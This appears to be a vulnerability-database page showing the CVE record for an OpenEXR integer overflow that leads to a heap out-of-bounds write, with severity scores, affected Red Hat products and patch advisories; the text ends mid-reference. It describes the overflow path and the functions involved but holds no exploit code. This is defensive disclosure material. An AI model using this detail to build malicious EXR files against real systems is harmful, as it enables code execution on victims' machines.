Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2026-27622 (GCVE-0-2026-27622)
Vulnerability from cvelistv5 – Published: 2026-03-03 22:42 – Updated: 2026-06-30 03:20
VLAI
EPSS
Title
OpenEXR CompositeDeepScanLine integer-overflow leads to heap OOB write
Summary
OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. In CompositeDeepScanLine::readPixels, per-pixel totals are accumulated in vector<unsigned int> total_sizes for attacker-controlled large counts across many parts, total_sizes[ptr] wraps modulo 2^32. overall_sample_count is then derived from wrapped totals and used in samples[channel].resize(overall_sample_count). Decode pointer setup/consumption proceeds with true sample counts, and write operations in core unpack (generic_unpack_deep_pointers) overrun the undersized composite sample buffer. This vulnerability is fixed in v3.2.6, v3.3.8, and v3.4.6.
Severity
SSVC
Exploitation: none
Automatable: no
Technical Impact: total
CISA Coordinator (v2.0.3)
Assigner
References
20 references
Impacted products
26 products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-27622",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-03-10T00:00:00+00:00",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-03-11T03:56:39.168Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"affected": [
{
"cpes": [
"cpe:/o:redhat:enterprise_linux_eus:10.0"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/o:redhat:enterprise_linux:10.1"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream (v. 10)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:enterprise_linux:8::appstream"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream (v. 8)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_aus:8.2::appstream"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream AUS (v. 8.2)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_aus:8.4::appstream"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream AUS (v.8.4)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_eus_long_life:8.4::appstream"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream EUS EXTENSION (v.8.4)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_aus:8.6::appstream"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream AUS (v.8.6)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_e4s:8.6::appstream"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream E4S (v.8.6)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_tus:8.6::appstream"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream TUS (v.8.6)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_e4s:8.8::appstream"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream E4S (v.8.8)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_tus:8.8::appstream"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream TUS (v.8.8)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_e4s:9.0::appstream"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream E4S (v.9.0)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_e4s:9.2::appstream"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream E4S (v.9.2)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_eus:9.4::appstream"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_eus:9.6::appstream"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream EUS (v.9.6)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:enterprise_linux:9::appstream"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream (v. 9)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/o:redhat:enterprise_linux:10.1"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:enterprise_linux:8::crb"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux CRB (v. 8)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_eus:9.4::crb"
],
"defaultStatus": "affected",
"product": "Red Hat CodeReady Linux Builder EUS (v.9.4)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_eus:9.6::crb"
],
"defaultStatus": "affected",
"product": "Red Hat CodeReady Linux Builder EUS (v.9.6)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:enterprise_linux:9::crb"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:ai_inference_server:3.3::el9"
],
"defaultStatus": "affected",
"product": "Red Hat AI Inference Server 3.3",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/o:redhat:enterprise_linux:6"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux 6",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/o:redhat:enterprise_linux_eus:10.0"
],
"defaultStatus": "unaffected",
"product": "Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/o:redhat:enterprise_linux:7"
],
"defaultStatus": "unaffected",
"product": "Red Hat Enterprise Linux 7",
"vendor": "Red Hat"
}
],
"datePublic": "2026-03-03T22:42:49.086Z",
"descriptions": [
{
"lang": "en",
"value": "A flaw was found in OpenEXR, an image storage format library for the motion picture industry. An attacker can craft a malicious EXR file that, when processed, causes an integer overflow in the `CompositeDeepScanLine::readPixels` function. This overflow leads to an undersized buffer allocation, which can then be overrun during write operations. Successful exploitation could result in arbitrary code execution or a denial of service (DoS)."
}
],
"metrics": [
{
"other": {
"content": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"value": "Important"
},
"type": "Red Hat severity rating"
}
},
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-190",
"description": "Integer Overflow or Wraparound",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-06-30T03:20:51.836Z",
"orgId": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"shortName": "redhat-SADP"
},
"references": [
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/security/cve/CVE-2026-27622"
},
{
"name": "RHBZ#2444251",
"tags": [
"issue-tracking",
"x_refsource_REDHAT"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444251"
},
{
"tags": [
"x_sadp-csaf-vex"
],
"url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-27622.json"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:7678"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:7682"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:8863"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:12340"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:12341"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:12339"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:12338"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:8870"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:8869"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:8871"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:8872"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:8888"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:16008"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:16030"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:16009"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:16174"
}
],
"solutions": [
{
"lang": "en",
"value": "RHSA-2026:7678: Red Hat Enterprise Linux AppStream EUS (v. 10.0)"
},
{
"lang": "en",
"value": "RHSA-2026:7682: Red Hat Enterprise Linux AppStream (v. 10), Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)"
},
{
"lang": "en",
"value": "RHSA-2026:8863: Red Hat Enterprise Linux AppStream (v. 8), Red Hat Enterprise Linux CRB (v. 8)"
},
{
"lang": "en",
"value": "RHSA-2026:12340: Red Hat Enterprise Linux AppStream AUS (v. 8.2)"
},
{
"lang": "en",
"value": "RHSA-2026:12341: Red Hat Enterprise Linux AppStream AUS (v.8.4), Red Hat Enterprise Linux AppStream EUS EXTENSION (v.8.4)"
},
{
"lang": "en",
"value": "RHSA-2026:12339: Red Hat Enterprise Linux AppStream AUS (v.8.6), Red Hat Enterprise Linux AppStream E4S (v.8.6), Red Hat Enterprise Linux AppStream TUS (v.8.6)"
},
{
"lang": "en",
"value": "RHSA-2026:12338: Red Hat Enterprise Linux AppStream E4S (v.8.8), Red Hat Enterprise Linux AppStream TUS (v.8.8)"
},
{
"lang": "en",
"value": "RHSA-2026:8870: Red Hat Enterprise Linux AppStream E4S (v.9.0)"
},
{
"lang": "en",
"value": "RHSA-2026:8869: Red Hat Enterprise Linux AppStream E4S (v.9.2)"
},
{
"lang": "en",
"value": "RHSA-2026:8871: Red Hat CodeReady Linux Builder EUS (v.9.4), Red Hat Enterprise Linux AppStream EUS (v.9.4)"
},
{
"lang": "en",
"value": "RHSA-2026:8872: Red Hat CodeReady Linux Builder EUS (v.9.6), Red Hat Enterprise Linux AppStream EUS (v.9.6)"
},
{
"lang": "en",
"value": "RHSA-2026:8888: Red Hat Enterprise Linux AppStream (v. 9), Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)"
},
{
"lang": "en",
"value": "RHSA-2026:16008: Red Hat AI Inference Server 3.3"
},
{
"lang": "en",
"value": "RHSA-2026:16030: Red Hat AI Inference Server 3.3"
},
{
"lang": "en",
"value": "RHSA-2026:16009: Red Hat AI Inference Server 3.3"
},
{
"lang": "en",
"value": "RHSA-2026:16174: Red Hat AI Inference Server 3.3"
}
],
"timeline": [
{
"lang": "en",
"time": "2026-03-03T23:02:15.379Z",
"value": "Reported to Red Hat."
},
{
"lang": "en",
"time": "2026-03-03T22:42:49.086Z",
"value": "Made public."
}
],
"title": "openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing",
"workarounds": [
{
"lang": "en",
"value": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability."
}
],
"x_adpType": "supplier",
"x_generator": {
"engine": "sadp-cli 1.0.0"
}
}
],
"cna": {
"affected": [
{
"product": "openexr",
"vendor": "AcademySoftwareFoundation",
"versions": [
{
"status": "affected",
"version": "\u003e= 2.3.0, \u003c 3.2.6"
},
{
"status": "affected",
"version": "\u003e= 3.3.0, \u003c 3.3.8"
},
{
"status": "affected",
"version": "\u003e= 3.4.0, \u003c 3.4.6"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. In CompositeDeepScanLine::readPixels, per-pixel totals are accumulated in vector\u003cunsigned int\u003e total_sizes for attacker-controlled large counts across many parts, total_sizes[ptr] wraps modulo 2^32. overall_sample_count is then derived from wrapped totals and used in samples[channel].resize(overall_sample_count). Decode pointer setup/consumption proceeds with true sample counts, and write operations in core unpack (generic_unpack_deep_pointers) overrun the undersized composite sample buffer. This vulnerability is fixed in v3.2.6, v3.3.8, and v3.4.6."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "LOCAL",
"baseScore": 8.4,
"baseSeverity": "HIGH",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "ACTIVE",
"vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-787",
"description": "CWE-787: Out-of-bounds Write",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-03-03T22:42:49.086Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963"
}
],
"source": {
"advisory": "GHSA-cr4v-6jm6-4963",
"discovery": "UNKNOWN"
},
"title": "OpenEXR CompositeDeepScanLine integer-overflow leads to heap OOB write"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-27622",
"datePublished": "2026-03-03T22:42:49.086Z",
"dateReserved": "2026-02-20T22:02:30.027Z",
"dateUpdated": "2026-06-30T03:20:51.836Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-27622",
"date": "2026-06-29",
"epss": "0.00164",
"percentile": "0.05975"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2026-27622\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-03T23:15:55.737\",\"lastModified\":\"2026-06-30T03:17:56.343\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. In CompositeDeepScanLine::readPixels, per-pixel totals are accumulated in vector\u003cunsigned int\u003e total_sizes for attacker-controlled large counts across many parts, total_sizes[ptr] wraps modulo 2^32. overall_sample_count is then derived from wrapped totals and used in samples[channel].resize(overall_sample_count). Decode pointer setup/consumption proceeds with true sample counts, and write operations in core unpack (generic_unpack_deep_pointers) overrun the undersized composite sample buffer. This vulnerability is fixed in v3.2.6, v3.3.8, and v3.4.6.\"},{\"lang\":\"es\",\"value\":\"OpenEXR proporciona la especificaci\u00f3n y la implementaci\u00f3n de referencia del formato de archivo EXR, un formato de almacenamiento de im\u00e1genes para la industria cinematogr\u00e1fica. En CompositeDeepScanLine::readPixels, los totales por p\u00edxel se acumulan en vector total_sizes para grandes recuentos controlados por el atacante en muchas partes, total_sizes[ptr] se ajusta m\u00f3dulo 2^32. overall_sample_count se deriva entonces de los totales ajustados y se utiliza en samples[channel].resize(overall_sample_count). La configuraci\u00f3n/consumo del puntero de decodificaci\u00f3n procede con recuentos de muestras verdaderos, y las operaciones de escritura en el desempaquetado central (generic_unpack_deep_pointers) desbordan el b\u00fafer de muestras compuesto de tama\u00f1o insuficiente. Esta vulnerabilidad se corrige en las versiones v3.2.6, v3.3.8 y v3.4.6.\"}],\"affected\":[{\"source\":\"security-advisories@github.com\",\"affectedData\":[{\"vendor\":\"AcademySoftwareFoundation\",\"product\":\"openexr\",\"versions\":[{\"version\":\"\u003e= 2.3.0, \u003c 3.2.6\",\"status\":\"affected\"},{\"version\":\"\u003e= 3.3.0, \u003c 3.3.8\",\"status\":\"affected\"},{\"version\":\"\u003e= 3.4.0, \u003c 3.4.6\",\"status\":\"affected\"}]}]},{\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\",\"affectedData\":[{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Enterprise Linux AppStream EUS (v. 10.0)\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/o:redhat:enterprise_linux_eus:10.0\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Enterprise Linux AppStream (v. 10)\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/o:redhat:enterprise_linux:10.1\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Enterprise Linux AppStream (v. 8)\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:enterprise_linux:8::appstream\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Enterprise Linux AppStream AUS (v. 8.2)\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:rhel_aus:8.2::appstream\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Enterprise Linux AppStream AUS (v.8.4)\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:rhel_aus:8.4::appstream\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Enterprise Linux AppStream EUS EXTENSION (v.8.4)\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:rhel_eus_long_life:8.4::appstream\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Enterprise Linux AppStream AUS (v.8.6)\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:rhel_aus:8.6::appstream\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Enterprise Linux AppStream E4S (v.8.6)\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:rhel_e4s:8.6::appstream\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Enterprise Linux AppStream TUS (v.8.6)\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:rhel_tus:8.6::appstream\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Enterprise Linux AppStream E4S (v.8.8)\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:rhel_e4s:8.8::appstream\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Enterprise Linux AppStream TUS (v.8.8)\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:rhel_tus:8.8::appstream\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Enterprise Linux AppStream E4S (v.9.0)\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:rhel_e4s:9.0::appstream\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Enterprise Linux AppStream E4S (v.9.2)\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:rhel_e4s:9.2::appstream\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Enterprise Linux AppStream EUS (v.9.4)\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:rhel_eus:9.4::appstream\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Enterprise Linux AppStream EUS (v.9.6)\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:rhel_eus:9.6::appstream\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Enterprise Linux AppStream (v. 9)\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:enterprise_linux:9::appstream\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/o:redhat:enterprise_linux:10.1\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Enterprise Linux CRB (v. 8)\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:enterprise_linux:8::crb\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat CodeReady Linux Builder EUS (v.9.4)\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:rhel_eus:9.4::crb\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat CodeReady Linux Builder EUS (v.9.6)\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:rhel_eus:9.6::crb\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:enterprise_linux:9::crb\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat AI Inference Server 3.3\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:ai_inference_server:3.3::el9\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Enterprise Linux 6\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/o:redhat:enterprise_linux:6\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)\",\"defaultStatus\":\"unaffected\",\"cpes\":[\"cpe:/o:redhat:enterprise_linux_eus:10.0\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Enterprise Linux 7\",\"defaultStatus\":\"unaffected\",\"cpes\":[\"cpe:/o:redhat:enterprise_linux:7\"]}]}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":8.4,\"baseSeverity\":\"HIGH\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"ACTIVE\",\"vulnConfidentialityImpact\":\"HIGH\",\"vulnIntegrityImpact\":\"HIGH\",\"vulnAvailabilityImpact\":\"HIGH\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}],\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\",\"baseScore\":7.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.8,\"impactScore\":5.9},{\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":7.4,\"baseSeverity\":\"HIGH\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.4,\"impactScore\":5.9}],\"ssvcV203\":[{\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"ssvcData\":{\"timestamp\":\"2026-03-10T00:00:00+00:00\",\"id\":\"CVE-2026-27622\",\"options\":[{\"exploitation\":\"none\"},{\"automatable\":\"no\"},{\"technicalImpact\":\"total\"}],\"role\":\"CISA Coordinator\",\"version\":\"2.0.3\"}}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-787\"}]},{\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-190\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:openexr:openexr:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"3.2.6\",\"matchCriteriaId\":\"637078D8-68DE-478F-B304-A08E80A7609C\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:openexr:openexr:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"3.3.0\",\"versionEndExcluding\":\"3.3.8\",\"matchCriteriaId\":\"529003A0-284B-4A1F-B4FF-CABB9A7534B5\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:openexr:openexr:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"3.4.0\",\"versionEndExcluding\":\"3.4.6\",\"matchCriteriaId\":\"44066539-F7B6-415A-AE11-0F80BB8741D7\"}]}]}],\"references\":[{\"url\":\"https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://access.redhat.com/errata/RHSA-2026:12338\",\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\"},{\"url\":\"https://access.redhat.com/errata/RHSA-2026:12339\",\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\"},{\"url\":\"https://access.redhat.com/errata/RHSA-2026:12340\",\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\"},{\"url\":\"https://access.redhat.com/errata/RHSA-2026:12341\",\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\"},{\"url\":\"https://access.redhat.com/errata/RHSA-2026:16008\",\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\"},{\"url\":\"https://access.redhat.com/errata/RHSA-2026:16009\",\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\"},{\"url\":\"https://access.redhat.com/errata/RHSA-2026:16030\",\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\"},{\"url\":\"https://access.redhat.com/errata/RHSA-2026:16174\",\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\"},{\"url\":\"https://access.redhat.com/errata/RHSA-2026:7678\",\"source\":\"0